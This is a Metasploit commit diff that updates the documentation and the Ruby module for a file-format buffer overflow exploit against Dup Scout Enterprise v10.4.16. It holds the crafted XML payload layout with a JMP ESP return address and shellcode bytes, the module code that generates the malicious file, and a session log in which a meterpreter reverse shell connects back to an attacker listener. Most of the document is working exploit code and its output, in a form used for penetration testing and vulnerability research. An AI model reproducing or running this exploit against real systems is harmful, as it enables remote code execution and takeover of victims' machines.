Updated Document and Module

jrobles-r7 · jrobles-r7 · commit bc1838928484 · 2018-02-01T10:05:50.000-06:00
Update the documentation based on analysis of the vulnerability.
Slight modifications to the exploit module as well to reduce the
size of the generated file and reduce bad characters.
diff --git a/documentation/modules/exploit/windows/fileformat/dupscout_xml.md b/documentation/modules/exploit/windows/fileformat/dupscout_xml.md
@@ -1,45 +1,79 @@
-This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16 by using the import command option to import a specially crafted xml file.
+## Overview
 
-## Vulnerable Application
-
-This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [www.dupscout.com](http://www.dupscout.com/setups/dupscoutent_setup_v10.4.16.exe).
+This module exploits a buffer overflow in libpal.dll that is used by [Dup Scout Enterprise v10.4.16](http://www.dupscout.com/setups/dupscoutent_setup_v10.4.16.exe). The buffer overflow occurs during a call to the SCA_XmlParser::GetToken function when a user-supplied Command file with a crafted name attribute is imported to the Dup Scout application. The SCA_XmlParser::GetToken function is passed a heap pointer as an argument, which was created by the SCA_XmlParser::LoadXmlFile function and contains data from the user-supplied Command file, and a pointer to a stack buffer that was created in the SCA_XmlParser::ParseXmlElement function. While parsing the name attribute, the SCA_XmlParser::GetToken function copies from the heap buffer to the stack buffer until a single quote (to match name=', or a double quote to match name=") is found or until it finishes reading from the allocated heap buffer.
 
 ## Verification Steps
 
-1. Start msfconsole
-2. Do: `exploit/windows/fileformat/dupscout_xml`
-3. Do: `set PAYLOAD [PAYLOAD]`
-4. Do: `run`
+- [ ] Install Dup Scout Enterprise on target system
+- [ ] `./msfconsole`
+- [ ] `use exploit/windows/fileformat/dupscout_xml`
+- [ ] `set payload windows/meterpreter/reverse_tcp`
+- [ ] `set lhost <lhost>`
+- [ ] `run`
+- [ ] `use exploit/multi/handler`
+- [ ] `set payload windows/meterpreter/reverse_tcp`
+- [ ] `set lhost <lhost>`
+- [ ] `run`
+- [ ] From the DupScout Enterprise menu select Command -> Import Command
+- [ ] Select file generated by metasploit
+- [ ] Get a session
+
+## Exploiting the Vulnerability
+
+The vulnerability can be exploited when the size of the name attribute is greater than 1560 bytes.
+
+Note: The allocated stack buffer size is 1564 bytes but the first four bytes are filled with `\xff` during execution of the SCA_XmlParser::GetToken function.
+
+Since the stack buffer was allocated as a local variable for the SCA_XmlParser::ParseXmlElement function, the program's control flow isn't taken over until the return of the SCA_XmlParser::ParseXmlElement function even though the return value is overwritten during execution of the SCA_XmlParser::GetToken function.
+
+The format of the crafted Command file will be:
+
+```
+buf = "<?xml ?><a name='"
+buf << make_nops(1560)   # Fill up the stack buffer
+buf << addr_of_jmp_esp   # overwrite the return address for SCA_XmlParser::ParseXmlElement
+buf << make_nops(16)     # account for ret 10h in SCA_XmlParser::ParseXmlElement
+buf << inst1             # LEA EAX, [ESP+14h] # Prepare EAX to jump to payload
+buf << inst2             # JMP EAX # Jump to our desired location
+buf << make_nops(14)     # Fill past possibly corrupted location
+buf << payload           # Location that is jumped to
+```
+
+Note: The last make_nops will offset the location of the payload. The offset is included to account for writes to the stack buffer that occur when whitespace characters are included in the Command file. By offsetting the payload, the number of bad characters can be reduced to just the single or double quote characters. 
+
+## Example Execution
+
+This exploit was tested on Windows 7 SP1 x64.
 
-## Example
 ```
-msf > use exploit/windows/fileformat/dupscout_xml 
-msf exploit(windows/fileformat/dupscout_xml) > set PAYLOAD windows/meterpreter/reverse_tcp
-PAYLOAD => windows/meterpreter/reverse_tcp
-msf exploit(windows/fileformat/dupscout_xml) > set LHOST 172.16.40.146 
-LHOST => 172.16.40.146
-msf exploit(windows/fileformat/dupscout_xml) > run
+msf5 > use exploit/windows/fileformat/dupscout_xml
+msf5 exploit(windows/fileformat/dupscout_xml) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(windows/fileformat/dupscout_xml) > set lhost 172.22.222.120
+lhost => 172.22.222.120
+msf5 exploit(windows/fileformat/dupscout_xml) > run
 
 [*] Creating 'msf.xml' file ...
-[+] msf.xml stored at /root/.msf4/local/msf.xml
-msf exploit(windows/fileformat/dupscout_xml) > use exploit/multi/handler 
-msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
-PAYLOAD => windows/meterpreter/reverse_tcp
-msf exploit(multi/handler) > set LHOST 172.16.40.146 
-LHOST => 172.16.40.146
-msf exploit(multi/handler) > run
-
-[*] Started reverse TCP handler on 172.16.40.146:4444 
-[*] Sending stage (179779 bytes) to 172.16.40.144
-[*] Meterpreter session 1 opened (172.16.40.146:4444 -> 172.16.40.144:49790) at 2018-01-24 20:56:56 +0000
-
-meterpreter > sysinfo 
-Computer        : PC
+[+] msf.xml stored at /home/msfdev/.msf4/local/msf.xml
+msf5 exploit(windows/fileformat/dupscout_xml) > use exploit/multi/handler
+msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf5 exploit(multi/handler) > set lhost 172.22.222.120
+lhost => 172.22.222.120
+msf5 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 172.22.222.120:4444 
+[*] Sending stage (179779 bytes) to 172.22.222.122
+
+meterpreter > getuid
+Server username: .\pwnduser
+meterpreter > sysinfo
+Computer        : .
 OS              : Windows 7 (Build 7601, Service Pack 1).
-Architecture    : x86
-System Language : pt_PT
+Architecture    : x64
+System Language : en_US
 Domain          : WORKGROUP
-Logged On Users : 1
+Logged On Users : 2
 Meterpreter     : x86/windows
 meterpreter > 
 ```
diff --git a/modules/exploits/windows/fileformat/dupscout_xml.rb b/modules/exploits/windows/fileformat/dupscout_xml.rb
@@ -33,12 +33,12 @@ def initialize(info = {})
       'Platform'        => 'win',
       'Payload'         =>
         {
-          'BadChars' => "\x00\x01\x02\x0a\x0b\x0c\x22\x27",
+          'BadChars' => "\x27",
           'StackAdjustment' => -3500
         },
       'Targets'         =>
         [
-          ['Windows Universal', { 'Ret' => 0x651BB77A  } ]
+          ['Windows Universal', { 'Ret' => 0x651BB77A  } ] # JMP ESP [QtGui4.dll]
         ],
       'Privileged'      => false,
       'DisclosureDate'  => 'Mar 29 2017',
@@ -51,23 +51,19 @@ def initialize(info = {})
   end
 
   def exploit
-    nops = make_nops(1000)*5
+    esp = "\x8d\x44\x24\x14" #LEA EAX, [ESP+14h]
+    jmp = "\xff\xe0" # JMP EAX
 
-    esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76]
-    jmp = "\xFF\xE0" # JMP EAX
-
-    buffer =  "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'"
-    buffer << nops[0,1560]
-    buffer << [target.ret].pack('V')
-    buffer << nops[0,16]
-    buffer << esp
-    buffer << jmp
-    buffer << nops[0,70]
-    buffer << payload.encoded
-    buffer << nops
-    buffer << "\n</classify>"
+    buf = "<?xml ?><a name='"
+    buf << make_nops(1560)
+    buf << [target.ret].pack('V')
+    buf << make_nops(16)
+    buf << esp
+    buf << jmp
+    buf << make_nops(14)
+    buf << payload.encoded
 
     print_status("Creating '#{datastore['FILENAME']}' file ...")
-    file_create(buffer)
+    file_create(buf)
   end
 end
